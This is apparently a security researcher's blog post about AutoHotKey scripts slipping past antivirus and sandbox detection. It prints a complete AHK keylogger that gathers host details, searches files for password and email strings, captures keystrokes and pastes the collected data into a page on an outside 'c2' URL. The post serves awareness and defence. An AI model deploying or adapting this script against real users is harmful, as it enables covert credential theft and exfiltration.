Don’t You Forget About AutoHotKey



In a world of “fileless malware”, elaborately chained attacks, living-off-the-land, and countless other use cases of fanciness it’s easy to forget some of the older and more basic things that will likely blindside every security appliance you employ. If your organization does application whitelisting properly or proactively addresses software potentially used for malicious actions, then you may have already mitigated this issue and can stop reading…

However, for those of us in the real world, please continue to hear me out. AutoHotKey scripts can achieve nearly every action a threat actor would ever want to achieve on a machine and then some. The software is often used by technical administrators and developers with heightened privileges to accomplish repetitive tasks, financial analysts with access to sensitive data, and operational folks to accomplish day-to-day business tasks. The scripts and tools that can be generated can save countless hours across an organization, but should we allow it?

The issue with AutoHotKey (AutoHotKey) is that it is so prevalently used by so many people to accomplish important tasks that it is regarded as “safe” and whitelisted outright by many security products available. In tandem with this is the fact that most security solutions simply don’t have the baked in logic set to understand or even ingest the file for analysis. Running an obviously malicious, non-obfuscated, and seemingly straightforward piece of AHK malware (code below) through VirusTotal shows a hit rate of 0/59. News flash, Windows Defender didn’t really help here either.

VirusTotal Results

What about CrowdStrike? As one of the top EDR/NGAV/sandboxes available in the industry you’d imagine it would easily handle this right? Well… not so fast, as CrowdStrike Falcon sandbox is not able to analyze these files properly according to their documentation.

The Falcon Sandbox supports PE files (.exe, .scr, .pif, .dll, .com, .cpl, etc.), Office (.doc, .docx, .ppt, .pps, .pptx, .ppsx, .xls, .xlsx, .rtf, .pub), PDF, APK, executable JAR, Windows Script Component (.sct), Windows Shortcut (.lnk), Windows Help (.chm), HTML Application (.hta), Windows Script File (*.wsf), Javascript (.js), Visual Basic (*.vbs, *.vbe), Shockwave Flash (.swf), Perl (.pl), Powershell (.ps1, .psd1, .psm1), Scalable Vector Graphics (.svg), Python (.py) and Perl (.pl) scripts, Linux ELF executables, MIME RFC 822 (*.eml) and Outlook *.msg files.

CrowdStrike Falcon Sandbox File Types

Recently there have been attempts to use AHK for pulling files down from various repositories such as Github, Bitbucket, and many others. Some examples:
AutoHotKey & BitBucket Used as Malware Slinger
Router DNS Hijacking - AutoHotKey and BitBucket
Let’s move on to the rudimentary example that I’ve created…

Disclaimer – I am not responsible for how you may use this code or any interpretation or modification of the below code in any way. This is for demonstration and education purposes only.

#NoTrayIcon

m::

Send, {enter}

Run, cmd.exe /c date /t > C:\ProgramData\txt.txt & time /t >> C:\ProgramData\txt.txt & hostname >> C:\ProgramData\txt.txt & ipconfig >> C:\ProgramData\txt.txt & findstr /S /i "pass @ email" *.txt* >> C:\ProgramData\txt.txt

Sleep, 200

Loop, 45

{

Input, KeyLog, L1

FileAppend, `n%KeyLog%, C:\ProgramData\txt.txt

Send, %KeyLog%

}

Run, cmd.exe /c clip < C:\ProgramData\txt.txt

Run, https://www.threatable.io/c2

Sleep, 400

Send, ^v{enter}^w

Sleep, 1000
Let’s break this down a little bit here… It won’t spawn a tray icon because of the value #NoTrayIcon. It triggers when the person would type the letter “m” such as “facebook.com” or “bank.com” and then Send the enter key to seamlessly move the person to their website of choice. It will run the commands date, time, hostname, ipconfig, and then finally go through the working directory of the context of the user’s command prompt to find strings in files pertaining to passwords and emails and append all of the data to a file.

This all happens rather "silently" to an average user minus the actual file create in the ProgramData directory and in milliseconds. The script will then keylog the input for the next 45 characters, likely the credentials for the site the victim is visiting. More importantly it captures the input in a variable and Sends the keylogged character as to not tip them off that nothing is being typed into the website form. Utilizing the clipboard (the clip command) all it takes for a “c2” is a landing page with a textbox waiting to POST request the information and a Control+V, then a quick exit out of the browser with Control+W. It will then sleep for a second and wait for the next website visit.

This sample took roughly an hour to put together at most. Honestly, the procrastination to write this blog post took infinitely longer at this point. I think mixing and mashing with other techniques this could be a valuable technique going forward for attackers to consider adding to their toolbelt. If nothing else, it could help facilitate other parts of the chain indicated by the use of AHK to pull files down by the previously mentioned malware samples.

I hope you all enjoyed this blog post. If you have any ideas for things you would like to see out of my site or would like to further collaborate in relation to anything cybersecurity always feel free to reach out to me on Twitter @InfoSec_Pom.